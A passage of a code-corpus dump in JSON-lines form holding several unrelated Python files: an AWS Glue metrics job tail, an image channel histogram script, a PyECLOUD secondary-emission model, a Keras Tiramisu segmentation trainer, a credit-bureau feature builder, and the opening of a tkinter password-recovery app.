preactions).option(\"postactions\", postactions).mode(\"append\").save()\n # DynamicFrame.fromDF(Sink0, glueContext, \"test_frame_conversion\")\n # print (\"Write form df end\")\n SNOWFLAKE_SOURCE_NAME = \"net.snowflake.spark.snowflake\"\n print (\"Writing started\")\n df.write.format(SNOWFLAKE_SOURCE_NAME).options(**snowflake_properties).option(\"dbtable\", stageTable).option(\"preactions\", preactions).option(\"postactions\", postactions).mode(\"append\").save()\n #glueContext.write_dynamic_frame.from_options(frame = DynamicFrame.fromDF(sourceDf,glueContext,\"sourceDf\"), connection_type=\"custom.spark\", connection_options=snowflake_properties_dynamic)\n print (\"write ended\")\n #namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type\n #'WorkerType': 'G.1X', 'NumberOfWorkers': 3, 'GlueVersion': '2.0'\n\ns3_client = boto3.resource('s3')\nbucket = s3_client.Bucket('terraform-20210726142826483100000007')\nfile_name = ('glue_job_metrics' + time + '.csv')\ns3_path = 'glue_job_metrics/'+run_date+'/'+file_name\nwrite_cvs_into_s3(bucket, s3_path)\njob.commit()\n","sub_path":"metric_collector_job.py","file_name":"metric_collector_job.py","file_ext":"py","file_size_in_byte":14162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"521253332","text":"import numpy as np\nimport cv2\nimport os\nimport glob\nfrom numpy import array\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\nimport matplotlib.mlab as mlab\n\ntry:\n os.mkdir('part2_plot')\nexcept:\n pass\n \n# Read images\nimg_dir=\"Part2_fig/\"\nthree_files = [\"6667.JPG\", \"1500.JPG\", \"0250.JPG\"]\na_list = [1., 6667./1000, 6667./250]\ng_channel = [2.465, 2.510, 2.518] # get from Part1\ncolors = ['b', 'g', 'r']\n\n# Plot\nfor i in range(0, len(three_files)):\n img=cv2.imread(img_dir+three_files[i])\n for channel, col in enumerate(colors):\n img_channel=img[:,:,channel]\n b_prime_g = np.power(img_channel, g_channel[channel])\n plt.subplot(2,2,channel+1)\n _max = int(pow(255,g_channel[channel]))+1\n plt.hist(b_prime_g.ravel(),bins=25,range=[0, _max],color=col.lower())\n plt.title('%s Channel' %col.upper())\n\n plt.gcf().set_size_inches(18.5, 10.5)\n plt.savefig('part2_plot/B\\'_vs_T_image_%s.jpg' %(three_files[i]))\n plt.gcf().clear()\n\n if i > 0:\n a = a_list[i]\n for channel, col in enumerate(colors):\n img_channel=img[:,:,channel]\n b_prime_g = np.power(img_channel, g_channel[channel])\n b_prime_g_div_a=np.divide(b_prime_g, a)\n plt.subplot(2,2,channel+1)\n _max = int(pow(255,g_channel[channel])/a)+1\n plt.hist(b_prime_g_div_a.ravel(),bins=25,range=[0, _max], color=col.lower())\n plt.title('%s Channel' %col.upper())\n \n plt.gcf().set_size_inches(18.5, 10.5)\n plt.savefig('part2_plot/B\\'_div_a_vs_T_image_%s.jpg' %(three_files[i]))\n plt.gcf().clear()\n","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"422040578","text":"#-Begin-preamble-------------------------------------------------------\n#\n# CERN\n#\n# European Organization for Nuclear Research\n#\n#\n# This file is part of the code:\n#\n# PyECLOUD Version 8.6.0\n#\n#\n# Main author: Giovanni IADAROLA\n# BE-ABP Group\n# CERN\n# CH-1211 GENEVA 23\n# SWITZERLAND\n# giovanni.iadarola@cern.ch\n#\n# Contributors: Eleonora Belli\n# Philipp Dijkstal\n# Lorenzo Giacomel\n# Lotta Mether\n# Annalisa Romano\n# Giovanni Rumolo\n# Eric Wulff\n#\n#\n# Copyright CERN, Geneva 2011 - Copyright and any other\n# appropriate legal protection of this computer program and\n# associated documentation reserved in all countries of the\n# world.\n#\n# Organizations collaborating with CERN may receive this program\n# and documentation freely and without charge.\n#\n# CERN undertakes no obligation for the maintenance of this\n# program, nor responsibility for its correctness, and accepts\n# no liability whatsoever resulting from its use.\n#\n# Program and documentation are provided solely for the use of\n# the organization to which they are distributed.\n#\n# This program may not be copied or otherwise distributed\n# without permission. This message must be retained on this and\n# any other authorized copies.\n#\n# The material cannot be sold. CERN should be given credit in\n# all references.\n#\n#-End-preamble---------------------------------------------------------\n\nfrom numpy import sqrt, exp\nfrom numpy.random import rand\nfrom .sec_emission_model_ECLOUD import SEY_model_ECLOUD\n\n\ndef yield_fun3(E, costheta, Emax, del_max, R0, E0):\n\n s = 1.35\n\n del_max_tilde = del_max * exp(0.5 * (1 - costheta))\n E_max_tilde = Emax * (1 + 0.7 * (1 - costheta))\n\n x = E / E_max_tilde\n\n del_true_sec = del_max_tilde * (s * x) / (s - 1 + x**s)\n del_reflected = R0 * ((sqrt(E) - sqrt(E + E0)) / (sqrt(E) + sqrt(E + E0)))**2\n\n delta = del_true_sec + del_reflected\n\n ref_frac = del_reflected / delta\n\n return del_true_sec, del_reflected, ref_frac\n\n\nclass SEY_model_acc_low_ene(SEY_model_ECLOUD):\n def __init__(self, Emax, del_max, R0, E0=150,\n E_th=None, sigmafit=None, mufit=None,\n switch_no_increase_energy=0, thresh_low_energy=None, secondary_angle_distribution=None,\n ):\n\n self.E_th = E_th\n self.sigmafit = sigmafit\n self.mufit = mufit\n self.switch_no_increase_energy = switch_no_increase_energy\n self.thresh_low_energy = thresh_low_energy\n self.secondary_angle_distribution = secondary_angle_distribution\n\n if secondary_angle_distribution is not None:\n from . import electron_emission\n self.angle_dist_func = electron_emission.get_angle_dist_func(secondary_angle_distribution)\n else:\n self.angle_dist_func = None\n\n self.Emax = Emax\n self.del_max = del_max\n self.R0 = R0\n self.E0 = E0\n\n def SEY_process(self, nel_impact, E_impact_eV, costheta_impact, i_impact):\n\n del_true_sec, del_reflected, ref_frac = yield_fun3(E_impact_eV, costheta_impact, self.Emax, self.del_max, self.R0, E0=self.E0)\n ref_prob = del_reflected\n beta_ts = del_true_sec / (1. - del_reflected)\n\n flag_elast = (rand(len(ref_prob)) < ref_prob)\n flag_truesec = ~(flag_elast)\n\n nel_emit = nel_impact.copy()\n nel_emit[flag_truesec] = nel_impact[flag_truesec] * beta_ts[flag_truesec]\n\n return nel_emit, flag_elast, flag_truesec\n","sub_path":"sec_emission_model_accurate_low_ene.py","file_name":"sec_emission_model_accurate_low_ene.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"44901734","text":"import importlib\r\nimport tensorflow as tf\r\nimport utils2; importlib.reload(utils2)\r\nimport keras\r\nimport numpy as np\r\nimport pandas as pd\r\nimport keras.backend as K\r\nfrom keras.models import Model\r\nfrom keras.layers import Activation, Dropout, BatchNormalization, Conv2D, Conv2DTranspose, Input, Reshape, MaxPooling2D\r\nfrom keras.regularizers import l2\r\nfrom keras.layers import concatenate\r\nimport cv2\r\nimport glob\r\nimport sys\r\nimport re\r\n\r\n\r\n\r\n# def open_image(fn): return np.array(Image.open(fn))\r\n#\r\n# imgs = np.stack([open_image(fn) for fn in fnames])\r\n# labels = np.stack([open_image(fn) for fn in lnames])\r\n#\r\n# imgs = imgs/255.\r\n#\r\n# save_array(PATH+'results/imgs2.bc', imgs)\r\n# save_array(PATH+'results/labels2.bc', labels)\r\n# imgs = load_array(PATH+'results/imgs2.bc')\r\n# labels = load_array(PATH+'results/labels2.bc')\r\n# imgs = load_array(PATH+'results/imgs.bc')\r\n# labels = load_array(PATH+'results/labels.bc')\r\n#\r\n# n,r,c,ch = imgs.shape\r\n# imgs-=0.4\r\n# imgs/=0.3\r\n#\r\n# # Train set\r\n# trn = imgs[is_test==False] # Training images\r\n# trn_labels = labels_int[is_test==False] # Training labels\r\n#\r\n# # Test set\r\n# test = imgs[is_test] # Test images\r\n# test_labels = labels_int[is_test] # Test labels ????\r\n#\r\n#\r\n# rnd_trn = len(trn_labels)\r\n# rnd_test = len(test_labels)\r\n\r\n# ########### With background ###############\r\nBasepath_with_background = '/Volumes/Segate 3TB/segmentation_data/imgs_background'\r\nwith_background_PNG = '/Volumes/Segate 3TB/segmentation_data/imgs_background/*.png'\r\n# ######### Without background ##############\r\nBasepath_without_background = '/Volumes/Segate 3TB/segmentation_data/imgs_no_background'\r\nwithout_background_PNG = '/Volumes/Segate 3TB/segmentation_data/imgs_no_background/*.png'\r\n\r\n\r\n####################################################################################################################\r\n####################################################################################################################\r\n\r\n\r\n# To map labeled/without_bakgnd images to their original versions and get w/_back--no_back pairs for training\r\n# def find_train_set(Basepath_with_background, Basepath_without_background,\r\n# with_background_PNG, without_background_PNG):\r\n# names_with_background = os.listdir(Basepath_with_background)\r\n# names_without_background = os.listdir(Basepath_without_background)\r\n#\r\n# with_background_DIRS = glob.glob(with_background_PNG)\r\n# without_background_DIRS = glob.glob(without_background_PNG)\r\n#\r\n# selected_names_with_background = []\r\n#\r\n# for image_without in range(0, len(names_without_background)): # 5001 iterations\r\n#\r\n# for image_with in range(0, len(names_with_background)): # 75015 iterations\r\n#\r\n# if (Counter(names_with_background[image_with][:11])) == (\r\n# Counter(names_without_background[image_without][:11])):\r\n# selected_names_with_background.append(names_with_background[image_with])\r\n#\r\n# df = pd.DataFrame(selected_names_with_background)\r\n# df.to_csv('selected_with_background.csv')\r\n# print(selected_names_with_background)\r\n\r\n\r\n# Convert no_bkgrnd images to 1D arrays of labels (960,540) of [0,1].\r\n# Saving the image labels to threshold image-array\r\n\r\n# def masks_to_labels(addrs): # Doesn't work when calling as a function for some reason !!!\r\n# labels = []\r\n# for image in range(0, len(addrs)):\r\n# print(image)\r\n# img = cv2.imread(addrs[image])\r\n# grayscaled = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# retval, threshold = cv2.threshold(grayscaled, 0, 255, cv2.THRESH_BINARY)\r\n# labels.append(threshold)\r\n# return labels\r\n# def load_image(addr):\r\n# # read an image and resize to (224, 224)\r\n# # cv2 load images as BGR, convert it to RGB\r\n# img = cv2.imread(addr)\r\n# img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_CUBIC)\r\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n# img = img.astype(np.float32)\r\n# return img\r\n# def _int64_feature(value):\r\n# return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\n# def _bytes_feature(value):\r\n# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\r\n# def atoi(text):\r\n# return int(text) if text.isdigit() else text\r\n# def natural_keys(text):\r\n# '''\r\n# alist.sort(key=natural_keys) sorts in human order\r\n# http://nedbatchelder.com/blog/200712/human_sorting.html\r\n# (See Toothy's implementation in the comments)\r\n# '''\r\n# return [atoi(c) for c in re.split('(\\d+)', text)]\r\n# def duplicate(testList, n):\r\n# # duplicate adresses so we have correct number of labels\r\n# return [ele for ele in testList for _ in range(n)]\r\n# ######################################## Write-Read from TFRecords ###############################################\r\n####################################################################################################################\r\n####################################################################################################################\r\n\r\n\r\n# image_addrs = glob.glob(with_background_PNG)\r\n# labels_addrs = glob.glob(without_background_PNG)\r\n#\r\n# # Sort adresses so images with background map images without\r\n# image_addrs.sort(key=natural_keys)\r\n# labels_addrs.sort(key=natural_keys)\r\n#\r\n# # duplicate each item in the list 15 times\r\n# labels_duplicated = duplicate(labels_addrs, 15)\r\n\r\n# Saving all adresses to make sure the mapping is correct\r\n# df = pd.DataFrame(\r\n# {\r\n# 'with_back': image_addrs,\r\n# 'without_back:': labels_duplicated\r\n# })\r\n#\r\n# df.to_csv('AI_segmentation_adresses.csv', sep=\",\")\r\n\r\n######################################################################\r\n# ################### Converting images to labels ####################\r\n######################################################################\r\n\r\n# all_labels = []\r\n# i = 0\r\n# for image in labels_duplicated:\r\n# i = i + 1\r\n# print(i)\r\n# img = cv2.imread(image)\r\n# grayscaled = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# retval, threshold = cv2.threshold(grayscaled, 0, 255, cv2.THRESH_BINARY)\r\n# # threshold = threshold/255\r\n# all_labels.append(threshold)\r\n#\r\n# print('len: ', len(all_labels))\r\n# print('type: ', type(all_labels))\r\n# print('shape of the 2nd item in the list: ', np.shape(all_labels[1]))\r\n# all_labels = np.array(all_labels)\r\n######################################################################\r\n######################################################################\r\n\r\n# # Train set of the data\r\n# train_addrs = image_addrs[0:int(0.8 * len(image_addrs))]\r\n# # train_labels = all_labels[0:int(0.8 * len(all_labels))]\r\n#\r\n# # Test set of the data\r\n# test_addrs = image_addrs[int(0.8 * len(image_addrs)):int(1.0 * len(image_addrs))]\r\n# test_labels = all_labels[int(0.8 * len(all_labels)):int(1.0 * len(all_labels))]\r\n\r\n###########################################################\r\n###########################################################\r\n# train_filename = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\n# # open the TFRecords file\r\n# writer = tf.python_io.TFRecordWriter(train_filename)\r\n# for i in range(len(train_addrs)):\r\n#\r\n# # print how many images are saved every 1000 images\r\n# if not i % 1000:\r\n# print('Train data: {}/{}'.format(i, len(train_addrs)))\r\n# sys.stdout.flush()\r\n#\r\n# # Load the image\r\n# img = load_image(train_addrs[i])\r\n# label = all_labels[i] # Arrays\r\n# label = label.astype(np.float32)\r\n#\r\n# # Create a dictionary of features, where the key is the name of the features and the value is a tf.train.Feature\r\n# feature = {'train/label': _bytes_feature(tf.compat.as_bytes(label.tostring())),\r\n# 'train/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}\r\n#\r\n# # Create an example protocol buffer\r\n# example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n#\r\n# # Serialize to string and write on the file\r\n# writer.write(example.SerializeToString())\r\n#\r\n# writer.close()\r\n# sys.stdout.flush()\r\n\r\n# ############################################################################\r\n\r\n# test_filename = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n# writer = tf.python_io.TFRecordWriter(test_filename)\r\n#\r\n# for i in range(len(test_addrs)):\r\n#\r\n# # print how many images are saved every 1000 images\r\n# if not i % 1000:\r\n# print('Test data: {}/{}'.format(i, len(test_addrs)))\r\n# sys.stdout.flush()\r\n#\r\n# # Load the image\r\n# img = load_image(test_addrs[i])\r\n# label = test_labels[i]\r\n# label = label.astype(np.float32)\r\n#\r\n# # Create a feature\r\n# feature = {'test/label': _bytes_feature(tf.compat.as_bytes(label.tostring())),\r\n# 'test/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}\r\n# # Create an example protocol buffer\r\n# example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n# # Serialize to string and write on the file\r\n# writer.write(example.SerializeToString())\r\n# writer.close()\r\n# sys.stdout.flush()\r\n\r\n\r\n\r\n# # ############################################ pre-defining layers #################################################\r\n# ####################################################################################################################\r\n# ####################################################################################################################\r\n#\r\ndef relu(x): return Activation('relu')(x)\r\ndef dropout(x, p): return Dropout(p)(x) if p else x\r\ndef bn(x): return BatchNormalization(axis=-1)(x)\r\ndef relu_bn(x): return relu(bn(x))\r\ndef concat(xs): return concatenate(xs, axis=-1)\r\ndef conv(x, nf, sz, wd, p, stride=1):\r\n x = Conv2D(nf, 3, strides=(1, 1), padding='same', kernel_initializer='he_uniform', kernel_regularizer=l2(wd))(x)\r\n return dropout(x, p)\r\ndef conv_relu_bn(x, nf, sz=3, wd=0, p=0, stride=1):\r\n return conv(relu_bn(x), nf, sz, wd=wd, p=p, stride=stride)\r\ndef dense_block(n,x,growth_rate,p,wd):\r\n added = []\r\n for i in range(n):\r\n b = conv_relu_bn(x, growth_rate, p=p, wd=wd)\r\n x = concat([x, b])\r\n added.append(b)\r\n return x,added\r\ndef transition_dn(x, p, wd):\r\n x = conv_relu_bn(x, x.get_shape().as_list()[-1], sz=1, p=p, wd=wd)\r\n return MaxPooling2D(strides=(2, 2))(x)\r\n return conv_relu_bn(x, x.get_shape().as_list()[-1], sz=1, p=p, wd=wd, stride=2)\r\ndef down_path(x, nb_layers, growth_rate, p, wd):\r\n skips = []\r\n for i,n in enumerate(nb_layers):\r\n x,added = dense_block(n,x,growth_rate,p,wd)\r\n skips.append(x)\r\n x = transition_dn(x, p=p, wd=wd)\r\n return skips, added\r\ndef transition_up(added, wd=0):\r\n x = concat(added)\r\n _, r, c, ch = x.get_shape().as_list()\r\n return Conv2DTranspose(ch, 3, strides=(2, 2), kernel_initializer='he_uniform',\r\n padding='same', kernel_regularizer=l2(wd))(x)\r\ndef up_path(added, skips, nb_layers, growth_rate, p, wd):\r\n for i,n in enumerate(nb_layers):\r\n x = transition_up(added, wd)\r\n x = concat([x,skips[i]])\r\n x,added = dense_block(n,x,growth_rate,p,wd)\r\n return x\r\ndef reverse(a): return list(reversed(a))\r\n\r\n\r\ndef format_image(data, size=(224, 224, 3)):\r\n data_out = tf.image.per_image_standardization(tf.image.decode_jpeg(data, channels=3))\r\n data_out.set_shape(size)\r\n data_cast = tf.cast(data_out, dtype=tf.float32)\r\n return data_cast\r\n\r\n\r\ndef format_label(data, size=(224, 224, 1)):\r\n data_out = tf.image.per_image_standardization(tf.image.decode_jpeg(data, channels=1))\r\n data_out.set_shape(size)\r\n data_cast = tf.cast(data_out, dtype=tf.float32)\r\n return data_cast\r\n\r\n\r\nfeatures_spec={\r\n 'train/label': tf.FixedLenFeature([], tf.string),\r\n 'train/image': tf.FixedLenFeature([], tf.string),\r\n 'test/label': tf.FixedLenFeature([], tf.string),\r\n 'test/image': tf.FixedLenFeature([], tf.string)\r\n}\r\n\r\n\r\ndef parse_train(serialized):\r\n features = tf.parse_single_example(serialized, features_spec)\r\n\r\n image = format_image(features['train/image'])\r\n label = format_label(features['train/label'])\r\n\r\n return image, label\r\n\r\ndef parse_validation(serialized):\r\n features = tf.parse_single_example(serialized, features_spec)\r\n\r\n image = format_image(features['test/image'])\r\n label = format_label(features['test/label'])\r\n\r\n return image, label\r\n#\r\n# # ########################################### Creating the Tiramisu #################################################\r\n# #####################################################################################################################\r\n# #####################################################################################################################\r\n#\r\ndef create_tiramisu(nb_classes, img_input, nb_dense_block=6, growth_rate=16, nb_filter=48, nb_layers_per_block=5, p=None, wd=0):\r\n\r\n if type(nb_layers_per_block) is list or type(nb_layers_per_block) is tuple:\r\n nb_layers = list(nb_layers_per_block)\r\n else:\r\n nb_layers = [nb_layers_per_block] * nb_dense_block\r\n\r\n # ################### a set of layers for the Tiramisu model #######################\r\n x = conv(img_input, nb_filter, 3, wd, 0)\r\n skips, added = down_path(x, nb_layers, growth_rate, p, wd)\r\n\r\n x = up_path(added, reverse(skips[:-1]), reverse(nb_layers[:-1]), growth_rate, p, wd)\r\n\r\n x = conv(x, nb_classes, 1, wd, 0)\r\n _, r, c, f = x.get_shape().as_list()\r\n x = Reshape((-1, nb_classes))(x)\r\n return Activation('softmax')(x)\r\n#\r\n#\r\n# # ####################################### Defining input/output #####################################################\r\n# #####################################################################################################################\r\n# #####################################################################################################################\r\n# Train_dataset = tf.data.TFRecordDataset(TFRecord_train)\r\n# Train_dataset = Train_dataset.map(parse_train)\r\n# Train_dataset = Train_dataset.shuffle(buffer_size=1024)\r\n# Train_dataset = Train_dataset.repeat(None)\r\n# Train_dataset = Train_dataset.batch(32)\r\n#\r\n#\r\n# Validation_dataset = tf.data.TFRecordDataset(TFRecord_validation)\r\n# Validation_dataset = Validation_dataset.map(parse_validation)\r\n# Validation_dataset = Validation_dataset.batch(32).repeat()\r\nTFRecord_train = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\nTFRecord_validation = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n\r\ntrain_feature = {'train/image': tf.FixedLenFeature([], tf.string),\r\n 'train/label': tf.FixedLenFeature([], tf.string)}\r\n\r\ntest_feature = {'test/image': tf.FixedLenFeature([], tf.string),\r\n 'test/label': tf.FixedLenFeature([], tf.string)}\r\n\r\n\r\ndef input_fn_train(filenames, train, buffer_size=1024):\r\n dataset = tf.data.TFRecordDataset(filenames=filenames)\r\n dataset = dataset.map(parse_train)\r\n dataset = dataset.shuffle(buffer_size=buffer_size)\r\n dataset = dataset.repeat(None)\r\n dataset = dataset.batch(32)\r\n return dataset\r\ndef input_fn_val(filenames, train, buffer_size=1024):\r\n dataset = tf.data.TFRecordDataset(filenames=filenames)\r\n dataset = dataset.map(parse_validation)\r\n dataset = dataset.shuffle(buffer_size=buffer_size)\r\n dataset = dataset.repeat(None)\r\n dataset = dataset.batch(32)\r\n return dataset\r\n\r\ndef train_input_fn():\r\n TFRecord_train = '/Volumes/Segate 3TB/segmentation_data/AI_background_train.tfrecords'\r\n return input_fn_train(filenames=TFRecord_train, train=True)\r\ndef validation_input_fn():\r\n TFRecord_validation = '/Volumes/Segate 3TB/segmentation_data/AI_background_test.tfrecords'\r\n return input_fn_val(filenames=TFRecord_validation, train=True)\r\ndef read_decode(train_data_path, test_data_path, train_feature, test_feature):\r\n # Create a list of file names and pass it to a queue\r\n train_filename_queue = tf.train.string_input_producer([train_data_path], num_epochs=1)\r\n test_filename_queue = tf.train.string_input_producer([test_data_path], num_epochs=1)\r\n\r\n # Define a reader and read the next record\r\n train_reader = tf.TFRecordReader()\r\n _, train_serialized_example = train_reader.read(train_filename_queue)\r\n test_reader = tf.TFRecordReader()\r\n _, test_serialized_example = test_reader.read(test_filename_queue)\r\n\r\n # Decode the record read by the reader\r\n train_features = tf.parse_single_example(train_serialized_example, features=train_feature)\r\n test_features = tf.parse_single_example(test_serialized_example, features=test_feature)\r\n\r\n # Convert the image data from string back to the numbers\r\n # Cast label data into int32\r\n # Reshape image data into the original shape\r\n train_image = tf.decode_raw(train_features['train/image'], tf.float32)\r\n train_label = tf.decode_raw(train_features['train/image'], tf.float32)\r\n\r\n train_image = tf.reshape(train_image, [224, 224, 3])\r\n train_label = tf.reshape(train_label, [224, 224, 1])\r\n\r\n print('train image', train_image)\r\n print('train_label', train_label)\r\n\r\n test_image = tf.decode_raw(test_features['test/image'], tf.float32)\r\n test_label = tf.decode_raw(test_features['test/image'], tf.float32)\r\n\r\n test_image = tf.reshape(test_image, [224, 224, 3])\r\n test_label = tf.reshape(test_label, [224, 224, 1])\r\n\r\n print('test_image', test_image)\r\n print('test_label', test_label)\r\n\r\n # Creates batches by randomly shuffling tensors\r\n train_images, train_labels = tf.train.shuffle_batch([train_image, train_label], batch_size=32, capacity=30,\r\n num_threads=1, min_after_dequeue=10)\r\n test_images, test_labels = tf.train.shuffle_batch([test_image, test_label], batch_size=32, capacity=30,\r\n num_threads=1, min_after_dequeue=10)\r\n\r\n return train_images, train_labels, test_images, test_labels\r\n\r\n\r\ntrain_images, train_labels, test_images, test_labels = read_decode(TFRecord_train, TFRecord_validation, train_feature, test_feature)\r\n# Train_dataset = train_input_fn()\r\n# Validation_dataset = validation_input_fn()\r\n\r\n\r\ninput_shape = (224, 224, 3)\r\nimg_input = Input(shape=input_shape)\r\nx = create_tiramisu(2, img_input, nb_layers_per_block=[4, 5, 7, 10, 12, 15], p=0.2, wd=1e-4)\r\n\r\n\r\n# ################################################## Model ########################################################\r\nwith tf.Session() as sess:\r\n\r\n # Initialize all global and local variables\r\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n sess.run(init_op)\r\n\r\n # Create a coordinator and run all QueueRunner objects\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n # Train set\r\n train_img, train_lbl = sess.run([train_images, train_labels])\r\n train_img = train_img.astype(np.uint8)\r\n train_lbl = train_lbl.astype(np.uint8)\r\n\r\n # Test set\r\n test_img, test_lbl = sess.run([test_images, test_labels])\r\n test_img = test_img.astype(np.uint8)\r\n test_lbl = test_lbl.astype(np.uint8)\r\n\r\n model = Model(img_input, x)\r\n\r\n\r\n # # Configuring the model for trainging\r\n model.compile(loss='sparse_categorical_crossentropy', optimizer=keras.optimizers.RMSprop(1e-3), metrics=[\"accuracy\"])\r\n model.optimizer = keras.optimizers.RMSprop(1e-3, decay=1-0.99995)\r\n model.optimizer = keras.optimizers.RMSprop(1e-3)\r\n K.set_value(model.optimizer.lr, 1e-3)\r\n model.fit(train_img, train_lbl, batch_size=None, epochs=100)\r\n\r\n# validation_data=np.array(Validation_dataset)\r\n# model.optimizer = keras.optimizers.RMSprop(3e-4, decay=1-0.9995)\r\n# model.fit_generator(gen, rnd_trn, 500, verbose=2, validation_data=gen_test, nb_val_samples=rnd_test)\r\n # Stop the threads\r\n coord.request_stop()\r\n\r\n # Wait for threads to stop\r\n coord.join(threads)\r\n sess.close()\r\n\r\n","sub_path":"Tiramisu_segmentation.py","file_name":"Tiramisu_segmentation.py","file_ext":"py","file_size_in_byte":20048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"475341923","text":"from dataclasses import dataclass, field, make_dataclass\nfrom typing import List, Any\n\nfrom campo.models import Campo, CampoAgregado\n\nreplaces = [\n # originacion\n \"avg_cred_max_nbk_tu_cl_acc\",\n \"avg_max_mop_bal_nbk_tu_op_acc\",\n \"num_max_mop_bal_nbk_tu_op_acc\",\n \"num_num_dlq_bal_nbk_tu_cl_acc\",\n # ingresos\n]\n\n\n@dataclass\nclass FeaturesBuro:\n features: List[str]\n campos: List[CampoAgregado] = field(init=False)\n\n # types\n subvariables_cuentas: type = field(init=False) # container class\n subvariables_vector_cuentas: type = field(init=False) # container class\n variables_cuentas: type = field(init=False) # container class\n\n subvariables_consultas: type = field(init=False) # container class\n variables_consultas: type = field(init=False) # container class\n\n subvariables_score: type = field(init=False) # container class\n variables_score: type = field(init=False) # container class\n\n def __post_init__(self):\n self.campos = self.construye_campos()\n self.configura_features_consultas()\n self.configura_features_score()\n self.configura_features_cuentas()\n\n def configura_features_consultas(self):\n self.subvariables_consultas = make_dataclass(\n 'SubVariablesConsultas',\n [(campo.nombre, float, None) for campo in self.subcampos_consultas]\n )\n\n self.variables_consultas = make_dataclass(\n 'VariablesConsultas',\n [(campo.nombre, float, None) for campo in self.campos_consultas]\n )\n\n def configura_features_score(self):\n self.subvariables_score = make_dataclass(\n 'SubVariablesScore',\n [(campo.nombre, float, None) for campo in self.subcampos_score]\n )\n\n self.variables_score = make_dataclass(\n 'VariablesScore',\n [(campo.nombre, float, None) for campo in self.campos_score]\n )\n\n def configura_features_cuentas(self):\n self.subvariables_cuentas = make_dataclass(\n 'SubVariablesCuentas',\n [(campo.nombre, float, None) for campo in self.subcampos_cuentas]\n )\n\n self.subvariables_vector_cuentas = make_dataclass(\n 'SubVariablesVectorCuentas',\n [(campo.nombre, float, None) for campo in self.subcampos_vector_cuentas]\n )\n\n self.variables_cuentas = make_dataclass(\n 'VariablesCuentas',\n [(campo.nombre, float, None) for campo in self.campos_cuentas]\n )\n\n def construye_campos(self):\n for i in range(0, len(self.features)):\n for rep in replaces:\n if self.features[i] == rep:\n self.features[i] = rep.replace('_tu', '')\n _campos = {}\n with open('caracteristicas/varmap.csv') as varmap_file:\n for line in varmap_file:\n line_split = line.strip('\\n').split('|')\n for feature in self.features:\n if line_split[0] == feature:\n try:\n field_split = line_split[1].split(',')\n subfield_split = field_split[2].split('-')\n if len(subfield_split) > 1:\n field_split[2] = CampoAgregado(*subfield_split)\n if field_split[-1] == '':\n field_split[-1] = None\n _campos[feature] = CampoAgregado(*field_split)\n except TypeError as e:\n print(e)\n raise e\n\n return [_campos[feature] for feature in self.features]\n\n @property\n def campos_score(self):\n return tuple(filter(lambda x: x.segmento == 'score', self.campos))\n\n @property\n def campos_cuentas(self):\n return tuple(filter(lambda x: x.segmento == 'cuentas', self.campos))\n\n @property\n def campos_consultas(self):\n return tuple(filter(lambda x: x.segmento == 'consultas', self.campos))\n\n @property\n def subcampos_cuentas(self):\n subcampos = set(map(\n lambda x: x.campo,\n filter(lambda x: not isinstance(x.campo, CampoAgregado), self.campos_cuentas)\n ))\n ret = set([])\n while subcampos:\n subcampo = subcampos.pop()\n if subcampo.variable == 'mop':\n ret.add(Campo('cuentas', 't_mop', subcampo.sufijo))\n ret.add(Campo('cuentas', 'peso_mop', subcampo.sufijo))\n else:\n ret.add(subcampo)\n return ret\n\n @property\n def subcampos_vector_cuentas(self):\n return set(map(\n lambda x: x.campo,\n filter(lambda x: getattr(x.campo, 'segmento', None) == 'ingreso', self.campos_cuentas)\n ))\n\n @property\n def subcampos_consultas(self):\n return set(map(lambda x: x.campo, self.campos_consultas))\n\n @property\n def subcampos_score(self):\n return set(map(lambda x: x.campo, self.campos_score))\n","sub_path":"caracteristicas/buro.py","file_name":"buro.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"5668933","text":"from tkinter import *\r\nimport sys\r\nimport time;\r\nimport random\r\nimport datetime\r\nimport os\r\nfrom PIL import ImageTk,Image\r\nfrom tkinter import messagebox\r\nimport re\r\nfrom tkinter import ttk\r\nimport tkinter.messagebox\r\n\r\n#set theme=[waldorf $: : argv 0]\r\n\r\ndef okp():\r\n RegCP.destroy()\r\n Window1()\r\n\r\ndef confirmPN():\r\n global RegCP\r\n usernamei=username.get()\r\n list_of_files=os.listdir('C:/Users/codei/Documents/ndaca')\r\n data = open(usernamei,\"r\")\r\n data1=data.read()\r\n RegCP=Toplevel()\r\n RegCP.title(\"recover password page\")\r\n RegCP.iconbitmap(\"favico.ico\")\r\n RegCP.resizable(width=False, height=False)\r\n RegCP.config(bg=\"brown\")\r\n labelCPt=Label(RegCP, text=\"this is your details\",bg=\"brown\")\r\n labelCPt.pack()\r\n labelCP=Label(RegCP, text=data1,bg=\"brown\")\r\n labelCP.pack()\r\n pas=LabelFrame(RegCP,bg=\"brown\")\r\n BtnCP=Button(pas, text=\"ok\", command=Window1,bg=\"brown\")\r\n \r\n 